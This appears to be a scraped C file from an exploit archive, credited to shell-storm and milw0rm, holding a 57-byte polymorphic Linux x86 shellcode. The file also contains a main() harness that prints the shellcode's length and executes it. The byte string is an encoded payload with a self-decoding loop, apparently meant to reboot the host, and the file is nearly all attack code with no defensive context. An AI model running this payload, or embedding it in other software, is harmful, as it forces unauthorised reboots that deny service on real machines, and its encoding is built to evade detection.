33 lines
No EOL
724 B
C
33 lines
No EOL
724 B
C
/*
|
|
* Title : reboot() polymorphic shellcode - 57 bytes
|
|
* Os: Linux x86
|
|
*
|
|
* Author: Jonathan Salwan - submit AT shell-storm.org
|
|
* Web: http://www.shell-storm.org
|
|
*
|
|
*
|
|
* !! Database of shellcodes => http://www.shell-storm.org/shellcode/
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80"
|
|
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
|
|
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
|
|
"\x32\xc1\x51\x69\x63\x70\x70\x75"
|
|
"\x69\x6f\x30\x73\x66\x69\x30\x74"
|
|
"\x63\x6a\x8a\xe4\x51\x8a\xe3\x54"
|
|
"\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce"
|
|
"\x81";
|
|
|
|
|
|
int main()
|
|
{
|
|
fprintf(stdout,"Length: %d\n",strlen(shellcode));
|
|
(*(void(*)()) shellcode)();
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2009-06-29]
|